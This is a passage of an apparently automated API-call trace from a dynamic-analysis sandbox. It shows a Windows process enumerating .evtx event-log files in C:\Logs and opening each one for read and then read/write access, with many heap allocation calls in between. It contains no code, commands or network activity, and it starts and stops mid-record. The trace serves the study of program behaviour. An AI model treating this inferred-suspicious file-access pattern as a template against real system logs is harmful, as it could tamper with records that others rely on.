ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.664] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.664] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0071.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0071.665] AreFileApisANSI () returned 1 [0071.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpUsedDefaultChar=0x0) returned 73 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.665] AreFileApisANSI () returned 1 [0071.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0071.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x26df0 [0071.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x26df0, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0071.665] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.666] GetFileType (hFile=0x410) returned 0x1 [0071.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x26df0 | out: hHeap=0x20000) returned 1 [0071.666] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.666] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.667] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.667] CloseHandle (hObject=0x410) returned 1 [0071.667] AreFileApisANSI () returned 1 [0071.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0071.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0071.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0071.667] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.667] GetFileType (hFile=0x410) returned 0x1 [0071.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0071.667] CloseHandle (hObject=0x410) returned 1 [0071.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0071.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0071.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0071.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0071.668] AreFileApisANSI () returned 1 [0071.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0071.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0071.668] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0071.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.668] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.669] AreFileApisANSI () returned 1 [0071.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.670] AreFileApisANSI () returned 1 [0071.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0071.670] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.670] GetFileType (hFile=0x410) returned 0x1 [0071.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.670] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.670] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.670] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.671] CloseHandle (hObject=0x410) returned 1 [0071.671] AreFileApisANSI () returned 1 [0071.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0071.671] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.671] GetFileType (hFile=0x410) returned 0x1 [0071.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.671] CloseHandle (hObject=0x410) returned 1 [0071.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0071.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0071.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0071.672] AreFileApisANSI () returned 1 [0071.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx") returned 56 [0071.672] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0071.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.672] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, 